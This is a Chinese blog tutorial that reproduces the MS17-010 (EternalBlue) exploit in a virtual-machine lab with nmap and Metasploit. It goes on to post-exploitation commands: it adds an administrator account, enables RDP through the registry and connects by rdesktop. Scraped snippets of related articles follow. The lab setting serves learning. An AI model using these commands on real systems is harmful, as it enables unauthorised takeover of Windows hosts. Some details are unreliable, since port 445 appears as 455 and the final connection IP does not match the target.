永恒之蓝漏洞复现

article/2025/8/21 10:08:57

一,永恒之蓝

一、漏洞简介\n1、永恒之蓝介绍:\n永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本:目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
 

二,复现环境

攻击机(192.168.0.12)

靶机(192.168.0.10)

注意:1.安装好的攻击机与靶机的ip可能与主机不在一个网段(比如我的主机ip在192.168.0.0/24网段,但攻击机在192.168.18.0/24,靶机则在192.168.220.0/24),这种就只需要在虚拟机设置=>网络适配器=>网络连接=>勾选桥接模式。如果还是不行就在菜单栏里的编剧=>虚拟网络编辑器=>vmnet0(桥接模式)将自动改为自己主机的网卡即可。

实验条件:(1)两台虚拟机可以相互ping通(2)并且靶机已将防火墙关闭(3)并且靶机(无补丁)已经开启了455端口。

三,复现过程

1,主机发现

进入攻击机(kali),打开终端使用nmap探测主机网段(192.168.0.0/24)存活主机nmap 192.168.0.10

 

 可以发现,靶机的455端口是开放的,永恒之蓝就是利用455端口的SMB服务,操作系统溢出漏洞。455是开放的那就可以快乐的进行下一步了。

2,应用永恒之蓝的漏洞模块MSF(msfconsole)

打开msfconsole

 

3,搜索"ms17-010" 

命令:search ms17-010

 这里可以得到一些工具,其中nauxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。一般配合使用,前者先扫描,若显示有漏洞,在用后者进行攻击。

4,使用扫描模块“auxiliary/scanner/smb/smb_ms17_010”

代码:use auxiliary/scanner/smb/smb_ms17_010

5,设置目标ip(靶机)或网段

命令:set rhost 192.168.0.10

 6,执行扫描

代码:run

如果出现以上情况,就说明存在漏洞。

7,使用ms17_010里面的攻击模块

命令:use exploit/windows/smb/ms17_010_eternalblue

 

注意这时再次输入:show options会发现需要重新输入一次靶机ip

 只需再次输入:set rhost 192.168.0.10即可

8,执行攻击(使用exploit或run)

9,得到靶机

使用命令:shell

 

 但会发现接下来内容存在乱码,这时使用命令:"chcp 65001"就可以解决乱码了!!!

 10,在靶机上创建新用户

命令:net user 用户名(kunkun) 密码 /add<注意空格>

如上便是添加成功了!

11,将用户kunkun添加至管理员组

命令:net localgroup administrators kunkun /add

如上便是添加成功了!

net user 便可查看创建的用户

12,开启远程桌面

第一步:查看3389端口是否开启

查看端口命令:netstat -ano

开启命令: 

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 可以看到3389端口已开启!!!

第二步:再开启一个终端

输入命令:rdesktop 192.168.0.13

 

 

 感谢观看!!!

 

 

 

 

 


http://chatgpt.dhexx.cn/article/DcL9ewNa.shtml

相关文章

永恒之蓝靶场

声明&#xff1a;本文仅限交流学习使用,请勿使用在任何非法商业活动,禁止用于非法用途。否则后果自负。如有侵权,请告知删除,谢谢! 在虚拟机上搭建win7环境&#xff08;靶机&#xff09; 攻击者kali2021版: 模拟永恒之蓝攻击过程的话&#xff0c;需要win7&#xff08;靶机&…

永恒之蓝复现

目录 1.知识点&#xff1a; 2.前提准备 3.复现 1.知识点&#xff1a; &#xff08;永恒之蓝适应低版本的电脑没有打ms17_010的补丁&#xff0c;现在win7以上的高版本已经不可以使用&#xff09; 百度百科&#xff1a;永恒之蓝是指2017年4月14日晚&#xff0c;黑客团体Shadow…

永恒之蓝MS17-010漏洞复现

永恒之蓝漏洞复现 永恒之蓝漏洞简介准备工作命令功能查询靶机IP地址Nmap工具Msf框架相关搜索指令如下设置扫描对象扫描对方是否存在445端口开始攻击 设置攻击载荷设置攻击机及靶机攻击成功简单演示攻击结束 永恒之蓝漏洞简介 本次漏洞复现主要展示如何复现一次永恒之蓝漏洞攻击…

kali之永恒之蓝使用流程(操作全套步骤)

第一步需要kali系统的电脑和win7系统电脑的ip的地址在同一网段&#xff0c;互相之间可以ping通。 第二步关闭win7系统的防火墙。 往往失败就是这两部分的错误。 下边开始进入正题。 打开我们的kali系统&#xff0c;永恒之蓝控制版面开启指令 &#xff1a;msfconsole 小马图…

网络攻防——永恒之蓝

永恒之蓝 1.引言2.永恒之蓝定义3.SMB协议3.windows7版本说明4.攻击实例4.1攻击者和被攻击者展示4.2详细攻击过程4.3接下来尝试攻击一下windows10 5.参考文献 1.引言 让一个不爱学习的人整天蒙英语题&#xff0c;听张宇的视频实在是枯燥了点&#xff0c;于是决定看看网安&#x…

Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

目录 一、永恒之蓝概述 二、SMB协议 三、准备工作 四、漏洞复现 1、主机发现 2、端口扫描 3、利用模块 五、演示功能 1.获取cmd 2.捕获屏幕 3.上传文件 4.下载文件 5.远程登录 6.上传后门 7.免杀加壳 8.运行wannacry 9.清除日志 六、预防方案 1.打开防火墙 …

ajax提交form表单+跨域

有时候我们需要提交form表单&#xff0c;而又不想影响跳转页面&#xff0c;同时还不影响浏览器的 正常访问&#xff0c;这个时候就用到了ajax提交 首先&#xff0c;要引入js文件 <script type"text/javascript" src"${ctx}/newoa/js/jquery.form.js"…

使用原生javascript实现ajax提交form表单

使用原生javascript实现ajax提交form表单 ============================ 1 准备表单 首先我们需要编写一个html代码,这里我是采用nodejs里面的jade模板引擎来进行生成html代码的。 form(action="/ajaxTest2",method="post",enctype="text/…

Jquery Ajax提交form表单

ajax技术带给我们的是良好的用户体验,同时,使用jquery可以简化开发,提高工作效率。 献上一个简单的例子: 前台代码: index.aspx <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="index.aspx.cs" Inherits="AjaxDemo…

客户端调用服务端异常 —— 远程主机强迫关闭了一个现有的连接**(问题已解决)

客户端调用服务端异常 —— 远程主机强迫关闭了一个现有的连接&#xff08;问题已解决&#xff09; 今天跟大家分享一个日常出现的问题&#xff0c;今天前段调用的时候突然出现了远程主机强迫关闭了一个现有的连接的问题&#xff0c;先看问题图。 然后开始排查原因&#xff0…

频繁发送socket命令返回:[WinError 10054] 远程主机强迫关闭了一个现有的连接

第一类 错误原因&#xff1a;发送http请求太过频繁&#xff0c;引起远程主机的怀疑&#xff0c;被网站怀疑是恶意攻击行为。 解决方法&#xff1a; 在发送命令之后关闭连接&#xff0c;防止被认为恶意连接设置socket默认等待时间 设置读取信息的最大时间限制&#xff0c;如果…

关于Redis出现“java.io.IOException: 远程主机强迫关闭了一个现有的连接”的一次排查

背景 最近在使用springboot&#xff08;Windows下&#xff09;连接redis&#xff08;云服务器&#xff09;开发时发现一些问题&#xff1a;连接成功的情况下&#xff0c;在一段时间未交互数据后&#xff0c;再次通过连接与Redis传输数据回出现异常java.io.IOException: 远程主…

远程主机强迫关闭了一个现有的连接.

报错信息&#xff1a; 解决方法&#xff1a; 1.在命令行中查找占用“5037”端口的程序PID netstat -aon|findstr “5037”2. 打开任务管理器&#xff0c;找到相应的PID【15692】&#xff0c;将占用的端口关闭。 3. 发现adb.exe与Android Studio.exe共用同一个端口 adb.exe——…

xdm,请求帮助

这个怎么搞&#xff0c;xdm

Ubuntu 安装 XDM 2018 ( Xtreme Download Manager 2018 )

Xtreme下载管理器是一个功能强大的工具&#xff0c;可以将下载速度提高到500&#xff05;&#xff0c;保存来自YouTube&#xff0c;DailyMotion&#xff0c;Facebook&#xff0c;Vimeo&#xff0c;Google Video和1000多个其他网站的流媒体视频&#xff0c;恢复损坏/死亡下载&am…

Linux系统的下载神器XDM

自从装了双系统后一直在寻找一款媲美Windows系统中IDM的下载神器&#xff0c;XDM被我从云海中捞了出来&#xff01;堪比IDM的下载速度&#xff0c;亦是一款神器。 使用说明书 下载地址&#xff1a;https://sourceforge.net/projects/xdman/解压后&#xff0c;使用终端进入该…

获取网页视频,日常下载工具推荐——XDM

Xtreme Download Manage 下载地址与浏览器关联工具的好处 下载地址 点击下载 与浏览器关联 需要谷歌&#xff0c;火狐或其他插件包&#xff0c;这里只提供谷歌插件&#xff0c;其他自行百度。 下载地址 下载后将后缀.crx改为.zip&#xff0c;进行解压缩&#xff0c;然…

谷歌浏览器扩展程序XDM_设计师的谷歌Chrome浏览器拓展程序推荐!Design Service Center...

01 Dualsub --Youtube 视频双语翻译字幕 在我们使用Youtube时时常会遇到我们想看的视频&#xff0c;但往往因为没有中文字幕而导致无法观看&#xff0c;现在Dualsub这款插件就能实现你的愿望了。他可以让Youtube同时显示两种语言字幕&#xff0c;可以是中英文&#xff0c;也可以…

GBase XDM Cluster 产品介绍

1.1. 产品特点 GBase XDM Cluster V8产品的主要特点有&#xff1a; 标准化&#xff1a; 数据库集群管理系统的访问遵循轻型目录访问协议LDAP v3&#xff0c;从而保持应用的标准性和独立性&#xff0c;提升了产品的易用性。便于与应用系统对接&#xff0c;同时也能够有效地降…

谷歌浏览器扩展程序XDM_如何下载和安装扩展程序?

今天分享一下怎么找拓展程序和安装拓展程序,这也是昨天答应了大家的。这个扩展程序真的是一个好东西,能够让你的浏览器变成高效、便捷、省钱的工具。 很多普通浏览器也有扩展程序商店,但是这个数量、功能等各方面还是不如谷歌浏览器强大,所以这里建议使用谷歌浏览器,以下文…